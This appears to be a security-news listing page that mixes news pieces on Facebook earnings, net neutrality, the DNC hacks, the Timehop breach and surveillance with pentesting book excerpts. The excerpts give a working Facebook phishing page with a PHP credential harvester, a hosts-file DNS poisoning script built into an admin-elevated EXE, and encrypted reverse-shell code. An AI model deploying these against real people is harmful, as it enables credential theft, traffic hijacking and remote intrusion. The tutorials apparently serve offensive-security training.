Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
All Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials - Security

172 Articles
article-image-why-wall-street-unfriended-facebook-stocks-lost-over-120-billion-in-market-value-after-q2-2018-earnings-call
Natasha Mathur
27 Jul 2018
6 min read
Save for later

Why Wall Street unfriended Facebook: Stocks fell $120 billion in market value after Q2 2018 earnings call

Natasha Mathur
27 Jul 2018
6 min read
After been found guilty of providing discriminatory advertisements on its platform earlier this week, Facebook hit yet another wall yesterday as its stock closed falling down by 18.96% on Thursday with shares selling at $176.26. This means that the company lost around $120 billion in market value overnight, making it the largest loss of value ever in a day for a US-traded company since Intel Corp’s two-decade-old crash. Intel had lost a little over $18 billion in one day, 18 years back. Despite the 41.24% revenue growth compared to last year, this was Facebook’s biggest stock market drop ever. Here’s the stock chart from NASDAQ showing the figures:   Facebook’s market capitalization was worth $629.6 on Wednesday. As soon as Facebook’s Earnings calls concluded by the end of market trading on Thursday, it’s worth dropped to $510 billion after the close. Also, as Facebook’s market shares continued to drop down during Thursday’s market, it left its CEO, Mark Zuckerberg with less than $70 billion, wiping out nearly $17 billion of his personal stake, according to Bloomberg. Also, he was demoted from the third to the sixth position on Bloomberg’s Billionaires Index. Active user growth starting to stagnate in mature markets According to David Wehner, CFO at Facebook, “the Daily active users count on Facebook reached 1.47 billion, up 11% compared to last year, led by growth in India, Indonesia, and the Philippines. This number represents approximately 66% of the 2.23 billion monthly active users in Q2”. Facebook’s daily active users He also mentioned that  “MAUs (monthly active users) were up 228M or 11% compared to last year. It is worth noting that MAU and DAU in Europe were both down slightly quarter-over-quarter due to the GDPR rollout, consistent with the outlook we gave on the Q1 call”. Facebook’s Monthly Active users In fact, Facebook has implemented several privacy policy changes in the last few months. This is due to the European Union's General Data Protection Regulation ( GDPR ) as the company's earnings report revealed the effects of the GDPR rules. Revenue Growth Rate is falling too Speaking of revenue expectations, Wehner gave investors a heads up that revenue growth rates will decline in the third and fourth quarters. Wehner states that the company’s “total revenue growth rate decelerated approximately 7 percentage points in Q2 compared to Q1. Our total revenue growth rates will continue to decelerate in the second half of 2018, and we expect our revenue growth rates to decline by high single-digit percentages from prior quarters sequentially in both Q3 and Q4.”  Facebook reiterated further that these numbers won’t get better anytime soon.                                                 Facebook’s Q2 2018 revenue Wehner further spoke explained the reasons for the decline in revenue,“There are several factors contributing to that deceleration..we expect the currency to be a slight headwind in the second half ...we plan to grow and promote certain engaging experiences like Stories that currently have lower levels of monetization. We are also giving people who use our services more choices around data privacy which may have an impact on our revenue growth”. Let’s look at other performance indicators Other financial highlights of Q2 2018 are as follows: Mobile advertising revenue represented 91% of advertising revenue for q2 2018, which is up from approx. 87% of the advertising revenue in Q2 2017. Capital expenditures for Q2 2018 were $3.46 billion which is up from $1.4 billion in Q2 2017. Headcount was 30,275 around June 30, which is an increase of 47% year-over-year. Cash, Cash equivalents, and marketable securities were $42.3 billion at the end of Q2 2018, an increase from $35.45 billion at the end of the Q2 2017. Wehner also mentioned that the company “continue to expect that full-year 2018 total expenses will grow in the range of 50-60% compared to last year. In addition to increases in core product development and infrastructure -- growth is driven by increasing investments -- safety & security, AR/VR, marketing, and content acquisition”. Another reason for the overall loss is that Facebook has been dealing with criticism for quite some time now over its content policies, its issues regarding user’s private data and its changing rules for advertisers. In fact, it is currently investigating data analytics firm Crimson Hexagon over misuse of data. Mark Zuckerberg also said over a conference call with financial analysts that Facebook has been investing heavily in “safety, security, and privacy” and that how they’re “investing - in security that it will start to impact our profitability, we’re starting to see that this quarter - we run this company for the long term, not for the next quarter”. Here’s what the public feels about the recent wipe-out: https://twitter.com/TeaPainUSA/status/1022586648155054081 https://twitter.com/alistairmilne/status/1022550933014753280 So, why did Facebook’s stocks crash? As we can see, Facebook’s performance itself in Q2 2018 has been better than its performance last year for the same quarter as far as revenue goes. Ironically, scandals and lawsuits have had little impact on Facebook’s growth. For example, Facebook recovered from the Cambridge Analytica scandal fully within two months as far share prices are concerned. The Mueller indictment report released earlier this month managed to arrest growth for merely a couple of days before the company bounced back. The discriminatory advertising verdict against Facebook, had no impact on its bullish growth earlier this week. This brings us to conclude that the public sentiments and market reactions against Facebook have very different underlying reasons. The market’s strong reactions are mainly due to concerns over the active user growth slowdown, the lack of monetization opportunities on the more popular Instagram platform, and Facebook’s perceived lack of ability to evolve successfully to new political and regulatory policies such as the GDPR. Wall Street has been indifferent to Facebook’s long list of scandals, in some ways, enabling the company’s ‘move fast and break things’ approach. In his earnings call on Thursday, Zuckerberg hinted that Facebook may not be keen on ‘growth at all costs’ by saying things like “we’re investing so much in security that it will significantly impact our profitability” and then Wehner adding, “Looking beyond 2018, we anticipate that total expense growth will exceed revenue growth in 2019.” And that has got Wall street unfriending Facebook with just a click of the button! Is Facebook planning to spy on you through your mobile’s microphones? Facebook to launch AR ads on its news feed to let you try on products virtually Decoding the reasons behind Alphabet’s record high earnings in Q2 2018  
Read more
  • 0
  • 0
  • 2650

article-image-furthering-the-net-neutrality-debate-gop-proposes-the-21st-century-internet-act
Sugandha Lahoti
18 Jul 2018
3 min read
Save for later

Furthering the Net Neutrality debate, GOP proposes the 21st Century Internet Act

Sugandha Lahoti
18 Jul 2018
3 min read
GOP Rep. Mike Coffman has proposed a new bill to solidify the principles of net neutrality into law, rather than them being a set of rules to be modified by the FCC every year. The bill known as the 21st Century Internet Act would ban providers from blocking, throttling, or offering paid fast lanes. It will also forbid them from participating in paid prioritization and charging access fees from edge providers. It could take some time for this amendment to be voted on in the Congress. It mostly depends on the makeup of Congress after the midterm elections. The 21st Century Internet Act modifies the Communications Act of 1934 and adds a new Title VIII section full of conditions specific to internet providers. This new title permanently codifies into law the ‘four corners’ of net neutrality”. The amendment proposes these measures: No Blocking A broadband internet access service provider can not block lawful content, or charge an edge provider a fee to avoid blocking of content. No Throttling The service provider cannot degrade and enhance (slow down or speed up) the internet traffic. No Paid prioritization The internet access provider may not engage in paid preferential treatment. No unreasonable Interference The service provider cannot interfere with the ability of end users to select, the internet access service of their choice. This bill aims to settle the long ongoing debate over whether internet access is an information service or a telecommunications service. In his letter to FCC Chairman Ajit Pai, Coffman mentions, “The Internet has been and remains a transformative tool, and I am concerned any action you may take to alter the rules under which it functions may well have significant unanticipated negative consequences.” As far as the FCC’s role is concerned, The 21st Century Internet act will solidify the rules of net neutrality, barring the FCC from modifying it. The commision will solely be responsible for watching over the bill’s implementation and enforce the law. This would include investigating unfair acts or practices, such as false advertising, misrepresenting the product etc. The Senate has already voted to save net neutrality, by passing the CRA measure back in May 2018. The Congressional Review Act, or CRA received 52-47 vote, overturning the FCC and taking net neutrality rules off the books. The 21st century Internet Act is being seen in a good light by The Internet Association, which represents Google, Facebook, Netflix and others, who commended Coffman on his bill and called it a "step in the right direction." For the rest of us, it will be quite interesting to see the bill’s progress and its fate as it goes through the voting process and then into the White House for final approval. 5 reasons why the government should regulate technology DCLeaks and Guccifer 2.0: How hackers used social engineering to manipulate the 2016 U.S. elections Tech, unregulated: Washington Post warns Robocalls could get worse
Read more
  • 0
  • 0
  • 2051

article-image-dcleaks-and-guccifer-2-0-how-hackers-used-social-engineering-to-manipulate-the-2016-u-s-elections
Savia Lobo
16 Jul 2018
5 min read
Save for later

DCLeaks and Guccifer 2.0: How hackers used social engineering to manipulate the 2016 U.S. elections

Savia Lobo
16 Jul 2018
5 min read
It’s been more than a year since the Republican party’s Donald Trump won the U.S Presidential elections against Democrat Hillary Clinton. However, Robert Mueller recently indicted 12 Russian military officers who meddled with the 2016 U.S. Presidential elections. These had hacked into the Democratic National Committee, the Democratic Congressional Campaign Committee, and the Clinton campaign. Mueller evoked that the Russians did it using Guccifer 2.0 and DCLeaks following which Twitter decided to suspend both the accounts on its platform. According to the San Diego Union-Tribune, Twitter found the handles of both Guccifer 2.0 and DCLeaks dormant for more than a year and a half. It also verified the accounts being loaded with disseminated emails which were stolen from both Clinton’s camp and the Democratic Party’s organization. Subsequently, it has suspended both accounts. Guccifer 2.0 is an online persona created by the conspirators and was falsely claimed to be a Romanian hacker to avoid evidence of Russian involvement in the 2016 U.S. presidential elections. They are also associated with the leaks of documents from the Democratic National Committee(DNC) through Wikileaks. DCLeaks, with the website, “dcleaks.com” published the stolen data. The DCLeaks site is known to be a front for Russian cyberespionage group Fancy Bear. Mueller, in his indictment, stated that both Guccifer 2.0 and DCLeaks have ties with the GRU (Russian military intelligence unit called the Main Intelligence Directorate) hackers. How hackers social engineered their way into the Clinton Campaign? The attackers or hackers have been said to use the hacking technique known as Spear phishing and the malware used in the process is the X-agent. It is a tool that can collect documents, keystrokes and other information from computers and smartphones through encrypted channels back to servers owned by hackers. As per Mueller’s indictment report, the conspirator created an email account on the name of a known member of the Clinton Campaign. This email id had one letter deviation and looked almost like the original one. Spear Phishing emails were sent across work accounts of more than thirty different Clinton Campaign employees using this fake account. The embedded link within these spear fished emails directed the recipient to a document titled ‘hillary-clinton-favorable-rating.xlsx.’. However, in reality, the recipients were being directed to a GRU-created website. X-agent uses an encrypted “tunneling protocol” tool known as X-Tunnel, that connected to known GRU-associated servers. Using the malware, X-agent, the GRU agents had targeted more than 300 individuals within the Clinton campaign, Democratic National Committee, and Democratic Congressional Campaign Committee, by March 2016.  At the same time, hackers stole nearly 50,000 emails from the Clinton campaign, and by June 2016 they had gained a control over 33 DNC computers and infected them with the malware. The indictment further explains that although the attackers ensured to hide their tracks by erasing the activity logs, the Linux-based version of X-agent programmed with the GRU_registered domain “linuxkrnl.net” were discovered in these networks. Was the Trump campaign impervious to such an attack? Roger Stone, Former Trump campaign adviser was said to be in contact with Guccifer 2.0 during the presidential campaign. As per Mueller ’s indictment, Guccifer 2.0 sent Stone this message, “Please tell me if i can help u anyhow...it would be a great pleasure for me...What do u think about the info on the turnout model for the democrats entire presidential campaign.”. “Pretty standard” was the reply given to Guccifer 2.0. However, Stone said that his conversations with the person behind the account were “innocuous.” Stone further added, “This exchange is entirely public and provides no evidence of collaboration or collusion with Guccifer 2.0 or anyone else in the alleged hacking of the DNC emails.” Stone also stated that he never discussed such innocuous communication with Trump or his presidential campaign. Rod Rosenstein, Deputy Attorney General, U.S  had indicated about this Russian attack since he was a part of Kremlin’s multifaceted approach to boost Trump’s 2016 campaign and on the other hand depreciating Clinton’s campaign. Twitter stated that both the accounts have been suspended for being connected to a network of accounts previously suspended for operating in violation of their rules. However, Hillary Clinton’s supporters expressed their anger by stating that Twitter’s responsiveness to stimuli was too slow and too little. With the midterm elections arriving soon in some months, one question on everyone’s mind is: how are the intelligence department and the department of justice going to ensure the elections are fair and secure? There are high chances of such attacks recurring. On being asked a similar question at a cybersecurity conference, Kirstjen Nielsen, Homeland Security Secretary responded, “Today I can say with confidence that we know whom to contact in every state to share threat information,” Nielsen said. “That ability did not exist in 2016.” Following is Rod Rosenstein’s interview with PBS NewsHour.   Social engineering attacks – things to watch out while online! YouTube has a $25 million plan to counter fake news and misinformation Twitter allegedly deleted 70 million fake accounts in an attempt to curb fake news    
Read more
  • 0
  • 0
  • 5166
Banner background image

article-image-timehop-suffers-data-breach-21-million-users-data-compromised
Richard Gall
09 Jul 2018
3 min read
Save for later

Timehop suffers data breach; 21 million users' data compromised

Richard Gall
09 Jul 2018
3 min read
Timehop, the social media application that brings old posts into your feed, experienced a data breach on July 4. In a post published yesterday (July 8) the team explained that 'an access credential to our cloud computing enterprise was compromised'. Timehop believes 21 million users have been affected by the breach. However, it was keen to state that "we have no evidence that any accounts were accessed without authorization." Timehop has already acted to make necessary changes. Certain application features have been temporarily disabled, and users have been logged out of the app. Users will also have to re-authenticate Timehop on social media accounts. The team has deactivated the keys that allow the app to read and show users social media posts on their feeds. Timehop explained that the gap between the incident and the public statement was due to the need to "contact with a large number of partners." The investigation needed to be thorough in order for the response to be clear and coordinated. How did the Timehop data breach happen? For transparency, Timehop published a detailed technical report on how it believes the hack happened. An unauthorized user first accessed Timehop's cloud computing environment using an authorized users credentials. This user then conducted 'reconnaisance activities' once they had created a new administrative account. This user logged in to the account on numerous occasions after this in March and June 2018. It was only on July 4 that the attacker then attempted to access the production database. Timehop then states that they "conducted a specific action that triggered an alarm" which allowed engineers to act quickly to stop the attack from continuing. Once this was done, there was a detailed and thorough investigation. This included analyzing the attacker's activity on the network and auditing all security permissions and processes. A measured response to a potential crisis It's worth noting just how methodical Timehop's response has been. Yes, there will be question marks over the delay, but it does make a lot of sense. Timehop revealed that the news was provided to some journalists "under embargo in order to determine the most effective ways to communicate what had happened while neither causing panic nor resorting to bland euphemism." The incident demonstrates that effective cybersecurity is as much about a robust communication strategy as it is about secure software.  Read next: Did Facebook just have another security scare? What security and systems specialists are planning to learn in 2018
Read more
  • 0
  • 0
  • 2174

article-image-facebook-password-phishing-dns-manipulation-tutorial
Savia Lobo
09 Jul 2018
6 min read
Save for later

Phish for Facebook passwords with DNS manipulation [Tutorial]

Savia Lobo
09 Jul 2018
6 min read
Password Phishing can result in huge loss of identity and user's confidential details. This could result in financial losses for users and can also prevent them from accessing their own accounts. In this article,  we will see how an attacker can take advantage of manipulating the DNS record for Facebook, redirect traffic to the phishing page, and grab the account password. This article is an excerpt taken from 'Python For Offensive PenTest' written by Hussam Khrais.  Facebook password phishing Here, we will see how an attacker can take advantage of manipulating the DNS record for Facebook, redirect traffic to the phishing page, and grab the account password. First, we need to set up a phishing page. You need not be an expert in web programming. You can easily Google the steps for preparing a phishing account. To create a phishing page, first open your browser and navigate to the Facebook login page. Then, on the browser menu, click on File and then on Save page as.... Then, make sure that you choose a complete page from the drop-down menu. The output should be an .html file. Now let's extract some data here. Open the Phishing folder from the code files provided with this book. Rename the Facebook HTML page index.html. Inside this HTML, we have to change the login form. If you search for action=, you will see it. Here, we change the login form to redirect the request into a custom PHP page called login.php. Also, we have to change the request method to GET instead of POST. You will see that I have added a login.php page in the same Phishing directory. If you open the file, you will find the following script: <?php header("Location: http://www.facebook.com/home.php? "); $handle = fopen("passwords.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "rn"); } fwrite($handle, "rn"); fclose($handle); exit; ?> As soon as our target clicks on the Log In button, we will send the data as a GET request to this login.php and we will store the submitted data in our passwords.txt file; then, we will close it. Next, we will create the passwords.txt file, where the target credentials will be stored. Now, we will copy all of these files into varwww and start the Apache services. If we open the index.html page locally, we will see that this is the phishing page that the target will see. Let's recap really quickly what will happen when the target clicks on the Log In button? As soon as our target clicks on the Log In button, the target's credentials will be sent as GET requests to login.php. Remember that this will happen because we have modified the action parameter to send the credentials to login.php. After that, the login.php will eventually store the data into the passwords.txt file. Now, before we start the Apache services, let me make sure that we get an IP address. Enter the following command: ifconfig eth0 You can see that we are running on 10.10.10.100 and we will also start the Apache service using: service apache2 start Let's verify that we are listening on port 80, and the service that is listening is Apache: netstat -antp | grep "80" Now, let's jump to the target side for a second. In our previous section, we have used google.jo in our script. Here, we have already modified our previous script to redirect the Facebook traffic to our attacker machine. So, all our target has to do is double-click on the EXE file. Now, to verify: Let us start Wireshark and then start the capture. We will filter on the attacker IP, which is 10.10.10.100: Open the browser and navigate to https://www.facebook.com/: Once we do this, we're taken to the phishing page instead. Here, you will see the destination IP, which is the Kali IP address. So, on the target side, once we are viewing or hitting https://www.facebook.com/, we are basically viewing index.html, which is set up on the Kali machine. Once the victim clicks on the login page, we will send the data as a GET request to login.php, and we will store it into passwords.txt, which is currently empty. Now, log into your Facebook account using your username and password. and jump on the Kali side and see if we get anything on the passwords.txt file. You can see it is still empty. This is because, by default, we have no permission to write data. Now, to fix this, we will give all files full privilege, that is, to read, write, and execute: chmod -R 777 /var/www/ Note that we made this, since we are running in a VirtualBox environment. If you have a web server exposed to the public, it's bad practice to give full permission to all of your files due to privilege escalation attacks, as an attacker may upload a malicious file or manipulate the files and then browse to the file location to execute a command on his own. Now, after giving the permission, we will stop and start the Apache server just in case: service apache2 stop service apache2 start After doing this modification, go to the target machine and try to log into Facebook one more time. Then, go to Kali and click on passwords.txt. You will see the submitted data from the target side, and we can see the username and the password. In the end, a good sign for a phishing activity is missing the https sign. We performed the password phishing process using Python. If you have enjoyed reading this excerpt, do check out 'Python For Offensive PenTest' to learn how to protect yourself and secure your account from these attacks and code your own scripts and master ethical hacking from scratch. Phish for passwords using DNS poisoning [Tutorial] How to secure a private cloud using IAM How cybersecurity can help us secure cyberspace
Read more
  • 0
  • 0
  • 17836

article-image-protect-tcp-tunnel-implementing-aes-encryption-with-python
Savia Lobo
15 Jun 2018
7 min read
Save for later

Protect your TCP tunnel by implementing AES encryption with Python [Tutorial]

Savia Lobo
15 Jun 2018
7 min read
TCP (Transfer Communication Protocol) is used to streamline important communications. TCP works with the Internet Protocol (IP), which defines how computers send packets of data to each other. Thus, it becomes highly important to secure this data to avoid MITM (man in the middle attacks). In this article, you will learn how to protect your TCP tunnel using the Advanced Encryption Standard (AES) encryption to protect its traffic in the transit path. This article is an excerpt taken from 'Python For Offensive PenTest'written by Hussam Khrais.  Protecting your tunnel with AES In this section, we will protect our TCP tunnel with AES encryption. Now, generally speaking, AES encryption can operate in two modes, the Counter (CTR) mode encryption (also called the Stream Mode) and the Cipher Block Chaining (CBC) mode encryption (also called the Block Mode). Cipher Block Chaining (CBC) mode encryption The Block Mode means that we need to send data in the form of chunks: For instance, if we say that we have a block size of 512 bytes and we want to send 500 bytes, then we need to add 12 bytes additional padding to reach 512 bytes of total size. If we want to send 514 bytes, then the first 512 bytes will be sent in a chunk and the second chunk or the next chunk will have a size of 2 bytes. However, we cannot just send 2 bytes alone, as we need to add additional padding of 510 bytes to reach 512 in total for the second chunk. Now, on the receiver side, you would need to reverse the steps by removing the padding and decrypting the message. Counter (CTR) mode encryption Now, let's jump to the other mode, which is the Counter (CTR) mode encryption or the Stream Mode: Here, in this mode, the message size does not matter since we are not limited with a block size and we will encrypt in stream mode, just like XOR does. Now, the block mode is considered stronger by design than the stream mode. In this section, we will implement the stream mode and I will leave it to you to search around and do the block mode. The most well-known library for cryptography in Python is called PyCrypto. For Windows, there is a compiled binary for it, and for the Kali side, you just need to run the setup file after downloading the library. You can download the library from http://www.voidspace.org.uk/python/modules.shtml#pycrypto. So, as a start, we will use AES without TCP or HTTP tunneling: # Python For Offensive PenTest # Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7 # http://www.voidspace.org.uk/python/modules.shtml#pycrypto # Download Pycrypto source # https://pypi.python.org/pypi/pycrypto # For Kali, after extract the tar file, invoke "python setup.py install" # AES Stream import os from Crypto.Cipher import AES counter = os.urandom(16) #CTR counter string value with length of 16 bytes. key = os.urandom(32) #AES keys may be 128 bits (16 bytes), 192 bits (24 bytes) or 256 bits (32 bytes) long. # Instantiate a crypto object called enc enc = AES.new(key, AES.MODE_CTR, counter=lambda: counter) encrypted = enc.encrypt("Hussam"*5) print encrypted # And a crypto object for decryption dec = AES.new(key, AES.MODE_CTR, counter=lambda: counter) decrypted = dec.decrypt(encrypted) print decrypted The code is quite straightforward. We will start by importing the os library, and we will import the AES class from Crypto.Cipher library. Now, we use the os library to create the random key and random counter. The counter length is 16 bytes, and we will go for 32 bytes length for the key size in order to implement AES-256. Next, we create an encryption object by passing the key, the AES mode (which is again the stream or CTR mode) and the counter value. Now, note that the counter is required to be sent as a callable object. That's why we used lambda structure or lambda construct, where it's a sort of anonymous function, like a function that is not bound to a name. The decryption is quite similar to the encryption process. So, we create a decryption object, and then pass the encrypted message and finally, it prints out the decrypted message, which should again be clear text. So, let's quickly test this script and encrypt my name. Once we run the script the encrypted version will be printed above and the one below is the decrypted one, which is the clear-text one: >>> ]ox:|s Hussam >>> So, to test the message size, I will just invoke a space and multiply the size of my name with 5. So, we have 5 times of the length here. The size of the clear-text message does not matter here. No matter what the clear-text message was, with the stream mode, we get no problem at all. Now, let us integrate our encryption function to our TCP reverse shell. The following is the client side script: # Python For Offensive PenTest# Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7 # http://www.voidspace.org.uk/python/modules.shtml#pycrypto # Download Pycrypto source # https://pypi.python.org/pypi/pycrypto # For Kali, after extract the tar file, invoke "python setup.py install" # AES - Client - TCP Reverse Shell import socket import subprocess from Crypto.Cipher import AES counter = "H"*16 key = "H"*32 def encrypt(message): encrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter) return encrypto.encrypt(message) def decrypt(message): decrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter) return decrypto.decrypt(message) def connect(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('10.10.10.100', 8080)) while True: command = decrypt(s.recv(1024)) print ' We received: ' + command ... What I have added was a new function for encryption and decryption for both sides and, as you can see, the key and the counter values are hardcoded on both sides. A side note I need to mention is that we will see in the hybrid encryption later how we can generate a random value from the Kali machine and transfer it securely to our target, but for now, let's keep it hardcoded here. The following is the server side script: # Python For Offensive PenTest # Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7 # http://www.voidspace.org.uk/python/modules.shtml#pycrypto # Download Pycrypto source # https://pypi.python.org/pypi/pycrypto # For Kali, after extract the tar file, invoke "python setup.py install" # AES - Server- TCP Reverse Shell import socket from Crypto.Cipher import AES counter = "H"*16 key = "H"*32 def connect(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("10.10.10.100", 8080)) s.listen(1) print '[+] Listening for incoming TCP connection on port 8080' conn, addr = s.accept() print '[+] We got a connection from: ', addr ... This is how it works. Before sending anything, we will pass whatever we want to send to the encryption function first. When we get the shell prompt, our input will be passed first to the encryption function; then it will be sent out of the TCP socket. Now, if we jump to the target side, it's almost a mirrored image. When we get an encrypted message, we will pass it first to the decryption function, and the decryption will return the clear-text value. Also, before sending anything to the Kali machine, we will encrypt it first, just like we did on the Kali side. Now, run the script on both sides. Keep Wireshark running in background at the Kali side. Let's start with the ipconfig. So on the target side, we will able to decipher or decrypt the encrypted message back to clear text successfully. Now, to verify that we got the encryption in the transit path, on the Wireshark, if we right-click on the particular IP and select Follow TCP Stream in Wireshark, we will see that the message has been encrypted before being sent out to the TCP socket. To summarize, we learned to safeguard our TCP tunnel during passage of information using the AES encryption algorithm. If you've enjoyed reading this tutorial, do check out Python For Offensive PenTest to learn to protect the TCP tunnel using RSA. IoT Forensics: Security in an always connected world where things talk Top 5 penetration testing tools for ethical hackers Top 5 cloud security threats to look out for in 2018
Read more
  • 0
  • 0
  • 18482
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $15.99/month. Cancel anytime
article-image-phish-for-passwords-using-dns-poisoning
Savia Lobo
14 Jun 2018
6 min read
Save for later

Phish for passwords using DNS poisoning [Tutorial]

Savia Lobo
14 Jun 2018
6 min read
Phishing refers to obtaining sensitive information such as passwords, usernames, or even bank details, and so on. Hackers or attackers lure customers to share their personal details by sending them e-mails which appear to come form popular organizatons.  In this tutorial, you will learn how to implement password phishing using DNS poisoning, a form of computer security hacking. In DNS poisoning, a corrupt Domain Name system data is injected into the DNS resolver's cache. This causes the name server to provide an incorrect result record. Such a method can result into traffic being directed onto hacker's computer system. This article is an excerpt taken from 'Python For Offensive PenTest written by Hussam Khrais.  Password phishing – DNS poisoning One of the easiest ways to manipulate the direction of the traffic remotely is to play with DNS records. Each operating system contains a host file in order to statically map hostnames to specific IP addresses. The host file is a plain text file, which can be easily rewritten as long as we have admin privileges. For now, let's have a quick look at the host file in the Windows operating system. In Windows, the file will be located under C:WindowsSystem32driversetc. Let's have a look at the contents of the host file: If you read the description, you will see that each entry should be located on a separate line. Also, there is a sample of the record format, where the IP should be placed first. Then, after at least one space, the name follows. You will also see that each record's IP address begins first and then we get the hostname. Now, let's see the traffic on the packet level: Open Wireshark on our target machine and start the capture. Filter on the attacker IP address: We have an IP address of 10.10.10.100, which is the IP address of our attacker. We can see the traffic before poisoning the DNS records. You need to click on Apply to complete the process. Open https://www.google.jo/?gws_rd=ssl. Notice that once we ping the name from the command line, the operating system behind the scene will do a DNS lookup: We will get the real IP address. Now, notice what happens after DNS poisoning. For this, close all the windows except the one where the Wireshark application is running. Keep in mind that we should run as admin to be able to modify the host file. Now, even though we are running as an admin, when it comes to running an application you should explicitly do a right-click and then run as admin. Navigate to the directory where the hosts file is located. Execute dir and you will get the hosts file. Run type hosts. You can see the original host here. Now, we will enter the command: echo 10.10.10.100 www.google.jo >> hosts 10.10.100, is the IP address of our Kali machine. So, once the target goes to google.jo, it should be redirected to the attacker machine. Once again verify the host by executing type hosts. Now, after doing a DNS modification, it's always a good thing to flush the DNS cache, just to make sure that we will use the updated record. For this, enter the following command: ipconfig /flushdns Now, watch what happens after DNS poisoning. For this, we will open our browser and navigate to https://www.google.jo/?gws_rd=ssl. Notice that on Wireshark the traffic is going to the Kali IP address instead of the real IP address of google.jo. This is because the DNS resolution for google.jo was 10.10.10.100. We will stop the capturing and recover the original hosts file. We will then place that file in the driversetc folder. Now, let's flush the poisoned DNS cache first by running: ipconfig /flushdns Then, open the browser again. We should go to https://www.google.jo/?gws_rd=ssl right now. Now we are good to go! Using Python script Now we'll automate the steps, but this time via a Python script. Open the script and enter the following code: # Python For Offensive PenTest # DNS_Poisoning import subprocess import os os.chdir("C:WindowsSystem32driversetc") # change the script directory to ..etc where the host file is located on windows command = "echo 10.10.10.100 www.google.jo >> hosts" # Append this line to the host file, where it should redirect # traffic going to google.jo to IP of 10.10.10.100 CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) command = "ipconfig /flushdns" # flush the cached dns, to make sure that new sessions will take the new DNS record CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) The first thing we will do is change our current working directory to be the same as the hosts file, and that will be done using the OS library. Then, using subprocesses, we will append a static DNS record, pointing Facebook to 10.10.10.100: the Kali IP address. In the last step, we will flush the DNS record. We can now save the file and export the script into EXE. Remember that we need to make the target execute it as admin. To do that, in the setup file for the py2exe, we will add a new line, as follows: ... windows = [{'script': "DNS.py", 'uac_info': "requireAdministrator"}], ... So, we have added a new option, specifying that when the target executes the EXE file, we will ask to elevate our privilege into admin. To do this, we will require administrator privileges. Let's run the setup file and start a new capture. Now, I will copy our EXE file onto the desktop. Notice here that we got a little shield indicating that this file needs an admin privilege, which will give us the exact result for running as admin. Now, let's run the file. Verify that the file host gets modified. You will see that our line has been added. Now, open a new session and we will see whether we got the redirection. So, let's start a new capture, and we will add on the Firefox. As you will see, the DNS lookup for google.jo is pointing to our IP address, which is 10.10.10.100. We learned how to carry out password phishing using DNS poisoning. If you've enjoyed reading the post, do check out, Python For Offensive PenTest to learn how to hack passwords and perform a privilege escalation on Windows with practical examples. 12 common malware types you should know Getting started with Digital forensics using Autopsy 5 pen testing rules of engagement: What to consider while performing Penetration testing
Read more
  • 0
  • 0
  • 5898

article-image-alarming-ways-governments-use-surveillance-tech
Neil Aitken
14 Jun 2018
12 min read
Save for later

Alarming ways governments are using surveillance tech to watch you

Neil Aitken
14 Jun 2018
12 min read
Mapquest, part of the Verizon company, is the second largest provider of mapping services in the world, after Google Maps. It provides advanced cartography services to companies like Snap and PapaJohns pizza. The company is about to release an app that users can install on their smartphone. Their new application will record and transmit video images of what’s happening in front of your vehicle, as you travel. Data can be sent from any phone with a camera – using the most common of tools – a simple mobile data plan, for example. In exchange, you’ll get live traffic updates, among other things. Mapquest will use the video image data they gather to provide more accurate and up to date maps to their partners. The real world is changing all the time – roads get added, cities re-route traffic from time to time. The new AI based technology Mapquest employ could well improve the reliability of driverless cars, which have to engage with this ever changing landscape, in a safe manner. No-one disagrees with safety improvements. Mapquests solution is impressive technology. The fact that they can use AI to interpret the images they see and upload the information they receive to update maps is incredible. And, in this regard, the company is just one of the myriad daily news stories which excite and astound us. These stories do, however, often have another side to them which is rarely acknowledged. In the wrong hands, Mapquest’s solution could create a surveillance database which tracked people in real time. Surveillance technology involves the use of data and information products to capture details about individuals. The act of surveillance is usually undertaken with a view to achieving a goal. The principle is simple. The more ‘they’ know about you, the easier it will be to influence you towards their ends. Surveillance information can be used to find you, apprehend you or potentially, to change your mind, without even realising that you had been watched. Mapquest’s innovation is just a single example of surveillance technology in government hands which has expanded in capability far beyond what most people realise. Read also: What does the US government know about you? The truth beyond the Facebook scandal Facebook’s share price fell 14% in early 2018 as a result of public outcry related to the Cambridge Analytica announcements the company made. The idea that a private company had allowed detailed information about individuals to be provided to a third party without their consent appeared to genuinely shock and appall people. Technology tools like Mapquest’s tracking capabilities and Facebook’s profiling techniques are being taken and used by police forces and corporate entities around the world. The reality of current private and public surveillance capabilities is that facilities exist, and are in use, to collect and analyse data on most people in the developing world. The known limits of these services may surprise even those who are on the cutting edge of technology. There are so many examples from all over the world listed below that will genuinely make you want to consider going off grid! Innovative, Ingenious overlords: US companies have a flare for surveillance The US is the centre for information based technology companies. Much of what they develop is exported as well as used domestically. The police are using human genome matching to track down criminals and can find ‘any family in the country’ There have been 2 recent examples of police arresting a suspect after using human genome databases to investigate crimes. A growing number of private individuals have now used publicly available services such as 23andme to sequence their genome (DNA) either to investigate further their family tree, or to determine the potential of a pre-disposition to the gene based component of a disease. In one example, The Golden State Killer, an ex cop, was arrested 32 years after the last reported rape in a series of 45 (in addition to 12 murders) which occurred between 1976 and 1986. To track him down, police approached sites like 23andme with DNA found at crime scenes, established a family match and then progressed the investigation using conventional means. More than 12 million Americans have now used a genetic sequencing service and it is 